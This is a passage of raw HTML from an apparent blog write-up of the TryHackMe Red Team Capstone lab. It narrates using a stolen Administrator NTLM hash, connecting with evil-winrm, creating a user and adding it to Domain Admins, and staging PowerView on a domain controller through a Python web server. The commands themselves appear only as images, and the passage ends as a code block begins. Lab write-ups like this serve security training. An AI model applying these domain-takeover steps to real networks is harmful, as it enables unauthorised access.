https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173631.png?resize=1536%2C645&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173631.png?w=1692&amp;ssl=1 1692w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>This worked out perfectly fine for us and we now have the NTLM hash for the Administrator user for the <code>CORPDC<\/code> machine! This is a big achievement. Having the Administrator&#8217;s hash, we can connect to the CORPDC machine via RDP or using <code>Winrm<\/code>. We can also try to crack the hash offline and find out the password for the Administrator.<\/p>\n\n\n\n<p>When trying to RDP we get a message that the account is not allowed to log in without a password or with a blank password.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09115859&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09115859\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"560\" data-attachment-id=\"503\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206174801\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206174801.png?fit=1641%2C897&amp;ssl=1\" data-orig-size=\"1641,897\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206174801\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206174801.png?fit=1024%2C560&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206174801.png?resize=1024%2C560&#038;ssl=1\" alt=\"\" class=\"wp-image-503\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206174801.png?resize=1024%2C560&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206174801.png?resize=300%2C164&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206174801.png?resize=768%2C420&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206174801.png?resize=1536%2C840&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206174801.png?w=1641&amp;ssl=1 1641w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We will need a password for the administrator to connect via RDP. Hashcat was not able to crack the hash. Our next option is to connect using <code>evil-winrm<\/code>.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09115ff6&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09115ff6\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"357\" data-attachment-id=\"504\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206173933\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173933.png?fit=1685%2C587&amp;ssl=1\" data-orig-size=\"1685,587\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206173933\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173933.png?fit=1024%2C357&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173933.png?resize=1024%2C357&#038;ssl=1\" alt=\"\" class=\"wp-image-504\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173933.png?resize=1024%2C357&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173933.png?resize=300%2C105&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173933.png?resize=768%2C268&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173933.png?resize=1536%2C535&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173933.png?w=1685&amp;ssl=1 1685w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>To get RDP access, we can create a new user as an Administrator.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>Changing the Administrator password is not recommend as this will not be a preferable option in real world pentest assignments.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>First, let&#8217;s create a user.<\/p>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09116748&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09116748\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"88\" data-attachment-id=\"505\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240208194436\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194436.png?fit=1638%2C141&amp;ssl=1\" data-orig-size=\"1638,141\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240208194436\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194436.png?fit=1024%2C88&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194436.png?resize=1024%2C88&#038;ssl=1\" alt=\"\" class=\"wp-image-505\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194436.png?resize=1024%2C88&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194436.png?resize=300%2C26&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194436.png?resize=768%2C66&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194436.png?resize=1536%2C132&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194436.png?w=1638&amp;ssl=1 1638w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Next, we will enumerate the groups to find the group name for the Administrator user.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09116d9c&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09116d9c\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"704\" data-attachment-id=\"506\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240208194519\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194519.png?fit=1388%2C954&amp;ssl=1\" data-orig-size=\"1388,954\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240208194519\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194519.png?fit=1024%2C704&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194519.png?resize=1024%2C704&#038;ssl=1\" alt=\"\" class=\"wp-image-506\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194519.png?resize=1024%2C704&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194519.png?resize=300%2C206&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194519.png?resize=768%2C528&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194519.png?w=1388&amp;ssl=1 1388w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Finally, we will add our user to this group to make him the <code>Domain Admin<\/code>.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09117545&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09117545\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"692\" data-attachment-id=\"507\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240208194558\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194558.png?fit=1543%2C1042&amp;ssl=1\" data-orig-size=\"1543,1042\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240208194558\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194558.png?fit=1024%2C692&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194558.png?resize=1024%2C692&#038;ssl=1\" alt=\"\" class=\"wp-image-507\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194558.png?resize=1024%2C692&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194558.png?resize=300%2C203&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194558.png?resize=768%2C519&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194558.png?resize=1536%2C1037&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194558.png?w=1543&amp;ssl=1 1543w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can now connect to RDP and submit the proof of compromises. Our network expands further revealing another domain on the network.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09117c5f&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09117c5f\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"625\" data-attachment-id=\"508\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206175504\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206175504.png?fit=1292%2C788&amp;ssl=1\" data-orig-size=\"1292,788\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206175504\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206175504.png?fit=1024%2C625&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206175504.png?resize=1024%2C625&#038;ssl=1\" alt=\"\" class=\"wp-image-508\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206175504.png?resize=1024%2C625&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206175504.png?resize=300%2C183&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206175504.png?resize=768%2C468&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206175504.png?w=1292&amp;ssl=1 1292w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"31-compromising-the-rootdc-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Compromising the ROOTDC<\/mark><\/h2>\n\n\n\n<p>Looking at the network topology, we can see that the AD Forest contains two child domains&#8211;CORPDC and BANKDC&#8211;and a parent DC&#8211;ROOTDC. Our shortest path to compromise the entire forest would be to compromise the ROOTDC first. This will give us access to the other machines on the network.<\/p>\n\n\n\n<p>We can begin our enumeration by finding out the Domain-Trust Relationship between the CORPDC and ROOTDC. To enumerate the Domains, we will use <code>PowerView<\/code>. PowerView is a PowerShell module using which we can run different commands to enumerate the domain.<\/p>\n\n\n\n<p>But first, we will need to get the PowerView script onto the CORPDC machine. To make the file transfer, we will perform the following steps:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Host the <code>PowerView.ps1<\/code> file on our Kali machine<\/li>\n\n\n\n<li>Get the file onto the <code>VPN<\/code> machine<\/li>\n\n\n\n<li>Host the file using a Python web server on the <code>VPN<\/code> machine<\/li>\n\n\n\n<li>Download the file to the <code>CORPDC<\/code> machine<\/li>\n<\/ul>\n\n\n\n<p><strong>On our Kali (Attack) Machine:<\/strong><\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" 